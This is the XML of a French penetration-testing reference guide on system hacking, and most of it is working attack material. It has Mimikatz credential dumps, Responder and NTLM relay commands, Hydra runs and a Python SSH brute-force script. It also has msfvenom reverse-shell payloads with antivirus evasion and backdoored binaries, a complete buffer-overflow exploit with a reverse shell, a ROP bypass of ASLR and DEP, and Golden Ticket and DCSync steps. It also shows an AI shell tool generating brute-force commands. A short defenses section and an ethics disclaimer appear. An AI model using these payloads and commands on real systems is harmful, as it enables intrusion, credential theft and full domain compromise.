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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3C5E"/>
          <w:sz w:val="76"/>
          <w:szCs w:val="76"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM HACKING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Guide de Reference Complet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p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Sujets couverts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Phases du Hacking et Methodologie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Base de donnees SAM et stockage des mots de passe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Authentification Kerberos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Types d'attaques sur les mots de passe et techniques de craquage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Empoisonnement LLMNR / NBT-NS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Attaques NTLM Relay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Brute Force SSH avec ShellGPT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Outils de craquage (Hashcat, John, Hydra, Mimikatz...)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Exploitation de vulnerabilites et Framework Metasploit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Buffer Overflow (detaille)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Contournement de l'ASLR et du DEP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Enumeration Active Directory avec PowerView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Exploitation du domaine et BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="55" w:after="55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Defenses et mesures de protection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A des fins educatives et ethiques uniquement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Phases du Hacking et Methodologie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hacking ethique suit une methodologie structuree en 5 phases principales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000"/>
        <w:gridCol w:w="28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 cles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Collecte d'informations sur la cible (passive ou active)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Maltego, Shodan, OSINT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Scanning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Identifier les ports ouverts, services, vulnerabilites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Nmap, Nessus, Nikto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Gaining Access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Exploiter les vulnerabilites pour penetrer le systeme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Metasploit, SQLmap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Maintaining Access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Installer des backdoors, rootkits, persistance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Meterpreter, RATs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Clearing Tracks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Effacer les logs et toute trace d'intrusion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Clearev, suppression de logs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Base de donnees SAM et stockage des mots de passe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base SAM (Security Account Manager) est une base de donnees Windows qui stocke les identifiants des utilisateurs locaux sous forme de hachage. Elle se trouve dans C:\Windows\System32\config\SAM et est verrouillee tant que Windows est en cours d'execution.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Format d'une entree SAM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nom_utilisateur : UserID (RID) : Hash_LM : Hash_NTLM : :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Administrateur : 500 : aad3b435b51404eeaad3b435b51404ee : 31d6cfe0d16ae931b73c59d7e0c089c0 : :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Jean           : 1001 : aad3b435b51404eeaad3b435b51404ee : 8846f7eaee8fb117ad06bdd830b7586c : :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 d'utilisateur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 du compte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RID (User ID)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Identifiant unique : Admin=500, Invite=501, Utilisateurs a partir de 1000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 LM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Ancien format (desactive par defaut sur Windows modernes) — valeur nulle : aad3b435...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 NTLM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 actuel — algorithme MD4 applique au mot de passe en Unicode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Extraction du SAM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Mimikatz — dump du SAM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mimikatz # privilege::debug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mimikatz # lsadump::sam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Via Volume Shadow Copy (contourner le verrou)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 save HKLM\SAM sam.bak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 save HKLM\SYSTEM system.bak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secretsdump.py -sam sam.bak -system system.bak LOCAL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Authentification Kerberos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Kerberos est le protocole d'authentification principal dans les environnements Active Directory. Il permet de prouver son identite sans jamais envoyer le mot de passe sur le reseau.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Composants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L'utilisateur qui veut acceder a une ressource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KDC (Key Distribution Center)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Serveur de confiance = Controleur de domaine dans l'AD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TGS (Ticket Granting Server)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Fait partie du KDC, delivre les tickets de service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cible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serveur ou la ressource a laquelle le client veut acceder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Deroulement de l'authentification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Client --&gt; KDC       : Demande d'authentification (AS-REQ)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KDC --&gt; Client       : TGT chiffre avec le hash du mot de passe (AS-REP)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Client --&gt; TGS       : TGT + demande de service (TGS-REQ)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TGS --&gt; Client       : Ticket de service pour le serveur cible (TGS-REP)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Client --&gt; Serveur   : Presentation du ticket de service (AP-REQ)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Serveur --&gt; Client   : Acces accorde OK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Attaques sur Kerberos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Attaque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Pass-the-Ticket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Voler et reutiliser un TGT sans connaitre le mot de passe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Mimikatz, Rubeus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Kerberoasting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Demander un ticket de service et cracker son hash hors ligne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Impacket, Rubeus, Hashcat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Golden Ticket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Forger un TGT avec le hash krbtgt — acces total au domaine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Mimikatz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Silver Ticket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Forger un ticket de service pour un service specifique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Mimikatz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ASREPRoasting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Attaquer les comptes sans pre-authentification Kerberos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Rubeus, Hashcat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Types d'attaques sur les mots de passe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Attaques non electroniques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Attaque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Shoulder Surfing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Observer physiquement quelqu'un taper son mot de passe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Ingenierie sociale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Manipuler une personne pour qu'elle revele ses identifiants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Dumpster Diving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Fouiller les poubelles pour trouver des documents sensibles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Attaques actives en ligne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Attaque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Attaque par dictionnaire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Tester une liste de mots de passe courants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Hydra, Hashcat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Tester toutes les combinaisons possibles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Hashcat, Medusa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Spraying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mot de passe teste sur de nombreux comptes (evite le verrouillage)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CrackMapExec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Credential Stuffing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Utiliser des identifiants voles d'autres fuites de donnees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Hydra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Keylogger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Capturer les frappes clavier via un malware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Metasploit keyscan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Injection de hash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Injecter un hash NTLM vole directement dans une session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Mimikatz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Attaques passives en ligne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Attaque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Sniffing reseau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Capturer les paquets reseau pour extraire les identifiants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Wireshark, tcpdump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Man-in-the-Middle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placer entre le client et le serveur pour intercepter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Bettercap, Ettercap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Capturer et rejouer une session d'authentification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Responder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Attaques hors ligne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Attaque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Rainbow Table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Comparer les hashes avec une table precalculee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Ophcrack, RainbowCrack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Brute Force hors ligne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Tester toutes les combinaisons sur un fichier de hash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Hashcat, John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Attaque distribuee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Repartir le craquage sur plusieurs machines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Hashcat cluster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Empoisonnement LLMNR / NBT-NS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LLMNR (Link-Local Multicast Name Resolution) et NBT-NS (NetBIOS Name Service) sont des protocoles Windows de resolution de noms locaux utilises quand le DNS echoue. Ils sont fondamentalement non securises car Windows fait confiance a n'importe quelle reponse sur le reseau.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Deroulement de l'attaque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L'attaquant se connecte au reseau local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La victime tape un mauvais nom d'hote : \\MAUVAIS-SERVEUR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Le DNS echoue a resoudre ce nom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Windows diffuse en broadcast LLMNR/NBT-NS : 'Qui connait MAUVAIS-SERVEUR ?'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Responder repond : 'C'est moi MAUVAIS-SERVEUR !'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La victime envoie son hash NTLMv2 pour s'authentifier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Responder capture le hash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Le hash est craque hors ligne avec Hashcat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Commandes Responder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Lancement de base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responder -I eth0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Mode verbeux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responder -I eth0 -v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Mode analyse seulement (pas d'empoisonnement)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responder -I eth0 -A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Emplacement des hashes captures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/usr/share/responder/logs/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Craquage du hash NTLMv2 capture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5600 hash_capture.txt /usr/share/wordlists/rockyou.txt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5600 hash_capture.txt rockyou.txt -r rules/best64.rule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john --wordlist=rockyou.txt hash_capture.txt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Defenses contre LLMNR/NBT-NS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Desactiver LLMNR via PowerShell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Set-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' -Name 'EnableMulticast' -Value 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Desactiver NBT-NS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$adapters = Get-WmiObject Win32_NetworkAdapterConfiguration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foreach ($a in $adapters) { $a.SetTCPIPNetBIOS(2) }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Attaque NTLM Relay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 lieu de cracker le hash NTLM capture, l'attaque NTLM Relay le transmet directement vers une autre machine pour obtenir un acces — sans jamais connaitre le mot de passe.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L'attaquant est sur le meme reseau local (LAN)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signature SMB (SMB Signing) est desactivee sur la cible (par defaut sur les postes de travail Windows)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compte relaie dispose de droits suffisants sur la machine cible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Etapes de l'attaque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1 — Trouver les machines sans SMB Signing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crackmapexec smb 192.168.1.0/24 --gen-relay-list cibles.txt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nmap --script smb2-security-mode -p 445 192.168.1.0/24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2 — Desactiver SMB et HTTP dans Responder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/etc/responder/Responder.conf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SMB = Off  |  HTTP = Off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3 — Lancer ntlmrelayx (Terminal 1)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ntlmrelayx.py -tf cibles.txt -smb2support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4 — Lancer Responder (Terminal 2)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responder -I eth0 -rdwv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Options avancees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ntlmrelayx.py -tf cibles.txt -smb2support -i          # Shell interactif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ntlmrelayx.py -tf cibles.txt -smb2support -c 'whoami' # Executer commande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ntlmrelayx.py -t ldap://IP-DC -smb2support --escalate-user utilisateur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Comparaison LLMNR vs NTLM Relay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LLMNR Poisoning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NTLM Relay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Capturer le hash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Relayer le hash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Besoin de cracker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Resultat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 de passe en clair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 direct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Reseau local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SMB Signing desactive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Outil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Responder seul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Responder + ntlmrelayx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Brute Force SSH avec ShellGPT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ShellGPT est un outil CLI qui utilise l'intelligence artificielle pour generer et executer des commandes shell a partir de descriptions en langage naturel.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Installation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shell-gpt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OPENAI_API_KEY='sk-xxxxxxxxxxxxx'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Flux d'attaque complet avec ShellGPT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1 — Scanner le port SSH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sgpt --shell 'scanner le port SSH sur 192.168.1.10'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--&gt; genere : nmap -sV -p 22 192.168.1.10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2 — Preparer les listes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sgpt --shell 'creer une liste de noms d utilisateurs linux courants'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3 — Lancer le brute force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sgpt --shell 'brute force SSH sur 192.168.1.10 avec rockyou et utilisateur root'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--&gt; genere : hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10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Etape 4 — Se connecter apres succes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sgpt --shell 'connexion SSH automatique avec mot de passe toor123'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--&gt; genere : sshpass -p 'toor123' ssh -o StrictHostKeyChecking=no root@192.168.1.10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Generer un script Python de brute force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sgpt --code 'script python brute force SSH avec paramiko'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Script Python genere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paramiko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ssh_brute_force(hote, utilisateur, fichier_mdp):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 = paramiko.SSHClient()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client.set_missing_host_key_policy(paramiko.AutoAddPolicy())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open(fichier_mdp, 'r') as f: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mdp in f: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mdp = mdp.strip()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try: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client.connect(hostname=hote, username=utilisateur, password=mdp, timeout=3)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print(f'[+] Mot de passe trouve : {mdp}')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client.close()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mdp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except paramiko.AuthenticationException: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print(f'[-] Echec : {mdp}')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except Exception as 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print(f'[!] Erreur : {e}')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ssh_brute_force('192.168.1.10', 'root', '/usr/share/wordlists/rockyou.txt')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Outils de craquage de mots de passe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Hashcat — Craquage GPU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L'outil de craquage le plus puissant — exploite la puissance du GPU pour des performances maximales.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Modes d'attaque (-a)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-a 0 = Dictionnaire | -a 1 = Combinaison | -a 3 = Brute Force | -a 6 = Hybride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Types de hash courants (-m)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0=MD5 | 100=SHA1 | 1000=NTLM | 5600=NTLMv2 | 13100=Kerberos TGS | 1800=SHA512crypt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Attaque par dictionnaire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1000 -a 0 hash.txt rockyou.txt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Brute Force — 8 caracteres, tous types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1000 -a 3 hash.txt ?a?a?a?a?a?a?a?a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Avec regles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1000 -a 0 hash.txt rockyou.txt -r rules/best64.rule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Masques : ?l=minuscules ?u=majuscules ?d=chiffres ?s=symboles ?a=tout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1000 -a 3 hash.txt ?u?l?l?l?l?d?d?s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John the Ripper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john --wordlist=rockyou.txt hash.txt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john --format=NT hash.txt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john --incremental hash.txt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john --show hash.txt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Cracker des fichiers ZIP, SSH, /etc/shadow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zip2john archive.zip &gt; hash_zip.txt &amp;&amp; john hash_zip.txt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ssh2john id_rsa &gt; hash_ssh.txt &amp;&amp; john hash_ssh.txt --wordlist=rockyou.txt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unshadow /etc/passwd /etc/shadow &gt; combine.txt &amp;&amp; john combine.txt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Hydra — Brute Force en ligne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hydra -l root -P rockyou.txt ssh://192.168.1.10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hydra -L utilisateurs.txt -P rockyou.txt ssh://192.168.1.10 -t 4 -V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hydra -l admin -P rockyou.txt ftp://192.168.1.10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hydra -l admin -P rockyou.txt rdp://192.168.1.10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hydra -l admin -P rockyou.txt 192.168.1.10 http-post-form '/login:user=^USER^&amp;pass=^PASS^:Invalide'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Mimikatz — Extraction de credentials Windows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privilege::debug                                      # Obtenir les privileges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sekurlsa::logonpasswords                              # Dump credentials en memoire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lsadump::sam                                          # Dump hashes SAM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lsadump::dcsync /domain:corp.local /user:administrator # Dump via DCSync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sekurlsa::pth /user:admin /domain:corp.local /ntlm:&lt;hash&gt; /run:cmd.exe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Meilleure utilisation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Hashcat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Hors ligne (GPU)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Craquage ultra-rapide de hashes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John the Ripper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Hors ligne (CPU)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Fichiers, archives, cles SSH, /etc/shadow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Hydra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ligne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 reseau : SSH, FTP, HTTP, RDP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Mimikatz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Dump memoire Windows, Pass-the-Hash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Ophcrack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Hors ligne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NTLM via Rainbow Tables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CrackMapExec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ligne/Hors ligne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Environnements Active Directory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Framework Metasploit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Metasploit est le framework de tests d'intrusion le plus utilise au monde. Il regroupe des exploits, des payloads, des modules auxiliaires, des encodeurs et des outils de post-exploitation.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Types de Payloads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Payload autonome — tout est integre en un seul bloc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windows/shell_reverse_tcp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Stagers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Petit chargeur qui telecharge le stage principal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windows/shell/reverse_tcp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Payload complet livre par le stager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meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w: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Generer un payload avec msfvenom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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe &gt; payload.exe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msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf &gt; payload.elf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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f psh &gt; payload.ps1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Utiliser un exploit dans msfconsole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exploit/windows/smb/ms17_010_eternalblue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RHOSTS 192.168.1.10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LHOST 192.168.1.5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LPORT 4444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PAYLOAD windows/x64/meterpreter/reverse_tcp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Modules Auxiliaires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Utilises pour le scan, l'enumeration et le fuzzing — sans exploitation directe.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auxiliary/scanner/smb/smb_ms17_010       # Scanner EternalBlue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auxiliary/scanner/ssh/ssh_login           # Brute force SSH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auxiliary/scanner/portscan/tcp            # Scan de ports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auxiliary/scanner/smb/smb_enumshares      # Enumerer partages SMB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auxiliary/scanner/snmp/snmp_enum          # Enumeration SNMP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Modules NOP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NOP (No Operation = 0x90) cree un 'sled' de no-ops avant le shellcode. Si l'adresse de retour pointe n'importe ou dans les NOPs, le CPU glisse jusqu'au shellcode, augmentant la fiabilite de l'exploit.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Ajouter 100 octets de NOP sled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msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 -n 100 -f exe &gt; payload.exe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Modules Encodeurs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encodeurs obfusquent les payloads pour contourner la detection par signature des antivirus.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shikata_ga_nai = encodeur polymorphique le plus populaire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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 \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-e x86/shikata_ga_nai -i 10 -f exe &gt; payload_encode.exe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-i 10 = 10 iterations d'encodage pour plus d'obfuscation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Modules d'Evasion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show evasion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evasion/windows/windows_defender_exe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LHOST 192.168.1.5 | set LPORT 4444 | run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Injecter dans un binaire legitime (template)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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 \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-x app_legitime.exe -k -f exe &gt; backdoor.exe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Modules de Post-Exploitation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Dans une session Meterpreter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sysinfo | getuid | getsystem | ps | migrate &lt;PID&gt;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keyscan_start        # Demarrer le keylogger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keyscan_dump         # Afficher les frappes capturees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keyscan_stop         # Arreter le keylogger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screenshot           # Capturer l'ecran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webcam_snap          # Photo via webcam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post/windows/gather/hashdump          # Dumper les hashes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post/windows/manage/persistence       # Persister sur le systeme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clearev                                   # Effacer les journaux d'evenements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download C:\Users\admin\passwords.txt   # Telecharger un fichier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Buffer Overflow (Detaille)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buffer overflow survient quand un programme ecrit plus de donnees dans un tampon qu'il ne peut en contenir, ecrasant la memoire adjacente — notamment l'adresse de retour (return address) sur la pile.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Organisation de la memoire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Adresses hautes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   STACK      |  &lt;-- Variables locales, adresse de retour, EBP sauvegarde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    HEAP      |  &lt;-- Allocation dynamique (malloc/new)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 BSS / DATA   |  &lt;-- Variables globales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   TEXT       |  &lt;-- Code du programme (lecture seule)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Adresses basses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Detail d'un cadre de pile (Stack Frame)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Parametres    |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Return Address |  &lt;-- CIBLE : controler EIP/RIP pour rediriger l'execution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Saved EBP     |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Buffer [64B]   |  &lt;-- Zone ou l'entree utilisateur est ecrite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+-----------------+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Code C vulnerable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#include &lt;string.h&gt;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fonction_vulnerable(char *entree)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char tampon[64];          // Seulement 64 octets alloues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strcpy(tampon, entree);   // AUCUNE verification de taille ! DANGEREUX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Fonctions dangereuses : strcpy, strcat, gets, sprintf, scanf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--&gt; Aucune verification de la taille de l'entree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Etapes du developpement d'un exploit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Etape 1 — Fuzzing (Trouver le crash)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socket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taille in range(100, 5000, 100):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payload = b'A' * taille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 = socket.socket()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s.connect(('192.168.1.10', 9999))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s.send(b'TRUN /.:/' + payload)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s.close()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print(f'[*] Envoye {taille} octets - OK')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print(f'[!] CRASH a {taille} octets !')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break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Etape 2 — Trouver l'offset (controler EIP)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Generer un pattern unique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msf-pattern_create -l 3000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Apres le crash, trouver l'offset exact a partir de la valeur EIP (ex: 0x39694438)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msf-pattern_offset -l 3000 -q 39694438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[*] Correspondance exacte a l'offset 2003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Etape 3 — Verifier le controle d'EIP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offset = 2003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 = b'A' * offset + b'B' * 4 + b'C' * 200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Dans le debogueur --&gt; EIP = 42424242 (BBBB) OK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Etape 4 — Identifier les Bad Characters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Tester tous les octets de 0x01 a 0xFF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Avec mona.py dans Immunity Debugger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!mona bytearray -b '\x00'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!mona compare -f bytearray.bin -a &lt;adresse ESP&gt;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Identifier les octets qui corrompent le payload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Etape 5 — Trouver une instruction JMP ESP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Trouver JMP ESP dans les modules charges (sans ASLR, sans DEP)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!mona jmp -r esp -cpb '\x00'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Resultat : 0x625011af : JMP ESP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Verifier avec nasm_shell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msf-nasm_shell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nasm &gt; jmp esp  --&gt;  FFE4  --&gt;  \xff\xe4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Etape 6 — Generer le shellcode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msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 \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-b '\x00\x0a\x0d' -f python -v shellcode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-b = bad chars a exclure du shellcode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Etape 7 — Exploit final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socket, struct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offset   = 2003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jmp_esp  = struct.pack('&lt;I', 0x625011af)  # Adresse en little endian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nop_sled = b'\x90' * 32                  # 32 octets de NOP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shellcode = b'\xfc\xbb...'               # Shellcode genere par msfvenom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  = b'A' * offset   # Remplissage jusqu'a EIP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 += jmp_esp          # Ecraser EIP avec JMP ESP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 += nop_sled         # NOP sled pour la fiabilite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 += shellcode        # Notre shellcode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 = socket.socket()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s.connect(('192.168.1.10', 9999))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s.send(b'TRUN /.:/' + payload)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s.close()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nc -lvnp 4444  --&gt; Recevoir le reverse shell !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Protections memoire et contournements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de contournement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ASLR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Randomise les adresses memoire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Fuite d'adresse, brute force (32 bits), ROP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 / NX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Empeche l'execution sur la pile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Chaines ROP, ret2libc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 Canary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Valeur sentinelle avant l'adresse de retour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Fuiter la valeur du canary via format string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SafeSEH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Protege les gestionnaires d'exceptions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Utiliser des modules sans SafeSEH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Sections memoire en lecture seule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Bypass RELRO partiel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Contournement de l'ASLR et du DEP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Contournement de l'ASLR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Technique 1 — Brute Force (32 bits uniquement)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Sur un systeme 32 bits, seulement 65 536 combinaisons sont possibles, rendant le brute force faisable. Sur 64 bits, cela est pratiquement impossible.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Technique 2 — Fuite d'adresse (Information Leak)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Forcer le programme a divulguer ses adresses memoire (via format string)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 = b'%p ' * 20   # Fuiter 20 valeurs de la pile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Parser les adresses pour calculer la base de libc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adresse_fuitee = int(adresses[5], 16)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base_libc      = adresse_fuitee - libc.symbols['puts']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adresse_system = base_libc + libc.symbols['system']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Contournement du DEP — Chaines ROP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Programmation Orientee Retour (ROP) reutilise des gadgets de code existants (petites sequences d'instructions terminees par RET) presents dans le binaire ou les bibliotheques — sans injecter de shellcode.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Trouver des gadgets ROP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ROPgadget --binary ./programme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ROPgadget --binary ./programme --string '/bin/sh'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ropper --file ./programme --search 'pop rdi'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Construire une chaine ROP avec pwntools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pwn import *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elf = ELF('./programme')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rop = ROP(elf)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pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]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Contournement combine ASLR + DEP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pwn import *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elf  = ELF('./programme')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libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')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rop  = ROP(elf)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1 : Fuiter l'adresse de libc via puts()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pop_rdi  = rop.find_gadget(['pop rdi', 'ret'])[0]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payload1 = flat(b'A'*40, pop_rdi, elf.got['puts'], elf.plt['puts'], elf.symbols['main'])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Calculer les adresses reelles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fuite       = u64(io.recv(6).ljust(8, b'\x00'))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base_libc   = fuite - libc.symbols['puts']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addr_system = base_libc + libc.symbols['system']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addr_binsh  = base_libc + next(libc.search(b'/bin/sh\x00'))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2 : Appeler system('/bin/sh')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ret_gadget = rop.find_gadget(['ret'])[0]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payload2   = flat(b'A'*40, ret_gadget, pop_rdi, addr_binsh, addr_system)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io.interactive()  # --&gt; SHELL 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pwntools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Python pour l'exploitation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ROPgadget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Trouver des gadgets ROP dans un binaire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ropper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Trouver des gadgets ROP (alternative)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checksec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Verifier les protections d'un binaire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GDB + pwndbg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Debogueur avance pour l'exploitation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Enumeration Active Directory avec PowerView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PowerView est un outil PowerShell permettant d'enumerer les environnements Active Directory : utilisateurs, groupes, machines, GPO, relations de confiance et chemins d'attaque.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Installation et import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Importer PowerView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powershell -ep bypass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Import-Module .\PowerView.ps1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Import en memoire (discret)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IEX (New-Object Net.WebClient).DownloadString('https://.../PowerView.ps1')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Enumeration des utilisateurs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Tous les utilisateurs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Get-DomainUser | select samaccountname, description, pwdlastset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Utilisateurs avec SPN (cibles Kerberoasting)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Get-DomainUser -SPN | select samaccountname, serviceprincipalname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Utilisateurs sans pre-auth Kerberos (ASREPRoasting)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Get-DomainUser -PreauthNotRequired | select samaccountname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Comptes administrateurs proteges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Get-DomainUser -AdminCount | select samaccountname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Mot de passe qui n'expire jamais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Get-DomainUser -UACFilter DONT_EXPIRE_PASSWORD | select samaccountname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Membres des admins du domaine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Get-DomainGroupMember 'Domain Admins' | select MemberName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Enumeration des machines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Get-DomainComputer | select name, operatingsystem, dnshostname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Get-DomainController | select name, ipaddress, forest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Get-DomainComputer -Unconstrained | select name          # Delegation non contrainte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Get-DomainComputer -TrustedToAuth | select name, msds-allowedtodelegateto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Get-NetLoggedon -ComputerName PC01                       # Qui est connecte sur PC01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Get-NetSession -ComputerName DC01                        # Sessions actives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Find-LocalAdminAccess                                    # Ou suis-je admin local ?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Enumeration des groupes et GPO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Get-DomainGroup | select name, description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Get-DomainGroupMember 'Enterprise Admins' -Recurse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Get-DomainGroup -UserName jean | select name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Get-NetLocalGroupMember -ComputerName PC01 -GroupName Administrators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Get-DomainGPO | select displayname, gpcfilesyspath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Get-DomainGPOUserLocalGroupMapping | select ObjectName, GPODisplayName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Enumeration des relations de confiance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Get-DomainTrust | select SourceName, TargetName, TrustDirection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Get-ForestTrust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Get-DomainTrustMapping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Bidirectionnel = acces mutuel | Entrant = ils nous font confiance | Sortant = nous leur faisons confiance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12.6 Enumeration ciblee par attaque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Attaque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PowerView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Kerberoasting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Get-DomainUser -SPN | select samaccountname, serviceprincipalname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ASREPRoasting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Get-DomainUser -PreauthNotRequired | select samaccountname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Delegation non contrainte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Get-DomainComputer -Unconstrained | select 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Delegation contrainte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Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto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local accessible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Find-LocalAdminAccess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Exploitation du domaine Active Directory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BloodHound — Cartographie des chemins d'attaque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BloodHound visualise les relations AD et trouve automatiquement le chemin le plus court vers l'administrateur du domaine.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Collecte des donnees avec SharpHound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Invoke-BloodHound -CollectionMethod All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.\SharpHound.exe -c All --stealth --outputdirectory C:\temp\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Requetes BloodHound essentielles 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'Find Shortest Path to Domain Admins'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'Find Kerberoastable users with path to DA'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'Find machines where Domain Admins are logged in'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'Find ASREPRoastable users'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Attaque DCSync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Necessite les droits de replication sur le domaine. Permet de dumper tous les hashes du controleur de domaine a distance.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Mimikatz — Dump de tous les hashes du domaine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lsadump::dcsync /domain:corp.local /all /csv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lsadump::dcsync /domain:corp.local /user:krbtgt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lsadump::dcsync /domain:corp.local /user:administrator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Impacket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secretsdump.py corp.local/admin:motdepasse@DC01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Golden Ticket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Avec le hash krbtgt, un attaquant peut forger un TGT pour n'importe quel utilisateur et obtenir un acces total et persistant au domaine.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Creer le Golden Ticket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kerberos::golden /user:FakeAdmin /domain:corp.local \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/sid:S-1-5-21-XXXXXXX /krbtgt:&lt;hash_krbtgt&gt; /id:500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Injecter le ticket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kerberos::ptt ticket.kirbi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Acces total au controleur de domaine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dir \\DC01\C$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PsExec.exe \\DC01 cmd.exe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Kerberoasting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Trouver et attaquer les comptes avec SPN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GetUserSPNs.py corp.local/jean:MotDePasse1 -dc-ip 192.168.1.10 -request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.\Rubeus.exe kerberoast /outfile:hashes.txt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Cracker hors ligne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13100 hashes.txt rockyou.txt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ASREPRoasting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.\Rubeus.exe asreproast /outfile:hashes_asrep.txt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hashcat -m 18200 hashes_asrep.txt rockyou.txt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Defenses et mesures de protection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Securite des mots de passe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Mise en oeuvre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Hachage fort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Utiliser bcrypt ou Argon2 au lieu de MD5/NTLM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Verrouillage de compte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Bloquer apres 3 a 5 tentatives echouees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Authentification multi-facteurs (MFA)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Activer sur tous les services critiques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 minimale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caracteres minimum + complexite obligatoire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Fail2ban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Bannir automatiquement les IPs apres des tentatives de brute force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Securite reseau et protocoles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Menace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Empoisonnement LLMNR/NBT-NS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Desactiver LLMNR et NBT-NS via GPO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NTLM Relay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Activer la signature SMB (SMB Signing) sur toutes les machines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Pass-the-Hash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Activer Protected Users et Credential Guard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Kerberoasting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Utiliser des mots de passe longs et complexes sur les comptes de service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Mouvement lateral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Segmentation reseau et modele d'administration par niveaux (Tiering)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Prevention du Buffer Overflow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ASLR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Activer la randomisation des adresses memoire a l'echelle du systeme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 / NX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Marquer la pile et le tas comme non executables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 Canary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Compiler avec l'option -fstack-protector-all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Fonctions securisees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Remplacer strcpy/gets par strncpy/fgets avec verification de taille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Revue de code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Audits reguliers + outils d'analyse statique (Valgrind, AddressSanitizer)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Durcissement Active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Appliquer le principe du moindre privilege — supprimer les droits admin inutiles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Desactiver les protocoles obsoletes : NTLMv1, hachage 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Activer LAPS (Local Administrator Password Solution)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Implementer le modele de niveaux AD (Tier 0 / 1 /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Surveiller les attaques DCSync, Golden Ticket, mouvement lateral avec un SIEM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Activer la politique d'audit avancee sur tous les controleurs de domaine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Schema recapitulatif — Flux d'attaque complet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/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RECONNAISSANCE EXTERNE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Nmap, Shodan, OSINT, Maltego, theHarvester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|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ACCES INITIAL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Exploiter une vulnerabilite (Metasploit, EternalBlue...)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Phishing / Ingenierie sociale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Attaque sur les mots de passe (Hydra, Spraying, LLMNR poisoning)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|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ELEVATION DE PRIVILEGES (LOCAL)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Buffer Overflow --&gt; Shell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Bypass ASLR + DEP --&gt; Chaine ROP --&gt; system()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Mimikatz --&gt; Dump des credentials en memoire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|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MOUVEMENT LATERAL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Pass-the-Hash (CrackMapExec, Impacket)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Pass-the-Ticket (Rubeus, Mimikatz)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NTLM Relay (ntlmrelayx)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PSExec / WMI / WinRM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|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ENUMERATION DU DOMAINE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PowerView --&gt; Utilisateurs, Groupes, SPNs, Relations de confiance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BloodHound --&gt; Visualisation des chemins d'attaque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Kerberoasting / ASREPRoasting --&gt; Craquage hors ligne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|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COMPROMISSION TOTALE DU DOMAINE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DCSync --&gt; Tous les hashes du domaine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Golden Ticket --&gt; Persistance illimitee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Administrateur du domaine compromis !</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C0392B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="12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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ce document est fourni a des fins educatives et ethiques uniquement.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Toujours obtenir une autorisation ecrite avant d'effectuer des tests de securite.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2026-03-06T15:30:46.510Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-06T15:30:46.511Z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